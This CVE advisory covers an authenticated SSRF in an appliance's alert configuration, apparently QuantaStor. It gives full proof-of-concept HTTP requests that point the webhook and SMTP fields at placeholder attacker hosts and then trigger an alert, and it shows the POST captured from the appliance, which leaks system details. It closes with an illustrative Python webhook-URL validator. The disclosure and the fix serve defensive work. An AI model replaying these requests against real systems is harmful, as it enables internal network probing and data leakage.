CVE-2021-42079
CVE vulnerability detail — eXtreme Datacenter Security Operations
Description
An authenticated administrator can configure the alert settings so that raising an alert makes the appliance issue a server-side request (SSRF) to an attacker-chosen URL. The outbound request is always a POST.

POC

Step 1: Prepare the SSRF with a request like this:

GET /qstorapi/alertConfigSet?senderEmailAddress=a&smtpServerIpAddress=BURPCOLLABHOST&smtpServerPort=25&smtpUsername=a&smtpPassword=1&smtpAuthType=1&customerSupportEmailAddress=1&poolFreeSpaceWarningThreshold=1&poolFreeSpaceAlertThreshold=1&poolFreeSpaceCriticalAlertThreshold=1&pagerDutyServiceKey=1&slackWebhookUrl=http://<target>&enableAlertTypes&enableAlertTypes=1&disableAlertTypes=1&pauseAlertTypes=1&mattermostWebhookUrl=http://<TARGET> HTTP/1.1
Host: <HOSTNAME>
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Connection: close
authorization: Basic <BASIC_AUTH_HASH>
Content-Type: application/json
Content-Length: 0

Step 2: Trigger the alert with this request:

GET /qstorapi/alertRaise?title=test&message=test&severity=1 HTTP/1.1
Host: <HOSTNAME>
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Connection: close
authorization: Basic <BASIC_AUTH_HASH>
Content-Type: application/json
Content-Length: 1

The POST request received by <TARGET> looks like this:

{
  ### Python FLASK stuff ####
  endpoint: index,
  method: POST,
  cookies: ImmutableMultiDict([]),
  ### END Python FLASK stuff ####
  data: b{
    "attachments": [
      {
        "fallback": "[122] test / test.",
        "color": "#aa2222",
        "title": "[122] test",
        "text": "test",
        "fields": [
          { "title": "Alert Severity", "value": "CRITICAL", "short": false },
          { "title": "Appliance", "value": "quantastor (https://<HOSTNAME>)", "short": true },
          { "title": "System / Driver / Kernel Ver", "value": "5.10.0.156+a25eaacef / scst-3.5.0-pre / 5.3.0-62-generic", "short": false },
          { "title": "System Startup", "value": "Fri Aug 6 16-02-55 2021", "short": true },
          { "title": "SSID", "value": "f4823762-1dd1-1333-47a0-6238c474a7e7", "short": true },
        ],
        "footer": "QuantaStor Call-home Alert",
        "footer_icon": " https://platform.slack-edge.com/img/default_application_icon.png ",
        "ts": 1628461774
      }
    ],
    "mrkdwn":true
  },
  #### FLASK REQUEST STUFF #####
  headers: {
    Host: <redacted>,
    User-Agent: curl/7.58.0,
    Accept: */*,
    Content-Type: application/json,
    Content-Length: 790
  },
  args: ImmutableMultiDict([]),
  form: ImmutableMultiDict([]),
  remote_addr: 217.103.63.173,
  path: /payload/58,
  whois_ip: TNF-AS, NL
}
#### END FLASK REQUEST STUFF #####
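The root cause is that the webhook URL parameters (slackWebhookUrl, mattermostWebhookUrl) are stored and later used as a POST destination without any restriction. The validator below is added here as an illustration of the check that breaks this SSRF pattern; it is not QuantaStor's own code, and the allow-list hosts, the injected resolver hook and the function names are assumptions.

```python
import ipaddress
from urllib.parse import urlsplit

# Hypothetical allow-list of webhook hosts an administrator may configure
# (constructed for this example; a real deployment would load it from config).
ALLOWED_WEBHOOK_HOSTS = {"hooks.slack.com", "mattermost.example.com"}


def is_public_address(ip_text):
    """True only for globally routable unicast addresses: rejects RFC 1918,
    loopback, link-local (incl. 169.254.x cloud metadata), multicast, reserved."""
    ip = ipaddress.ip_address(ip_text)
    return not (ip.is_private or ip.is_loopback or ip.is_link_local
                or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def validate_webhook_url(url, resolver=lambda host: []):
    """Validate a webhook URL before it is stored in the alert configuration.

    Returns (ok, reason). `resolver` maps a hostname to the list of IP strings
    it resolves to; it is injected so the check runs offline in tests. The
    sender should connect to exactly the addresses validated here (pinning),
    otherwise DNS rebinding between validation and the POST bypasses the check.
    """
    parts = urlsplit(url)
    if parts.scheme != "https":
        return False, "scheme must be https"
    if parts.username is not None or parts.password is not None:
        return False, "credentials in URL are not allowed"
    host = parts.hostname
    if not host:
        return False, "missing host"
    try:
        port = parts.port  # raises ValueError on a non-numeric port
    except ValueError:
        return False, "invalid port"
    if port not in (None, 443):
        return False, "only port 443 is allowed"
    try:
        ipaddress.ip_address(host)  # IPv4 or IPv6 literal (urlsplit strips [])
        return False, "IP literals are not allowed; use an allow-listed hostname"
    except ValueError:
        pass  # not an IP literal, continue with hostname checks
    if host not in ALLOWED_WEBHOOK_HOSTS:
        return False, f"host {host!r} is not in the webhook allow-list"
    for addr in resolver(host):
        if not is_public_address(addr):
            return False, f"{host} resolves to non-public address {addr}"
    return True, "ok"
```

Even with an allow-list, keep the resolved-address check: a compromised or rebinding DNS answer for an allowed name would otherwise still point the appliance at an internal host.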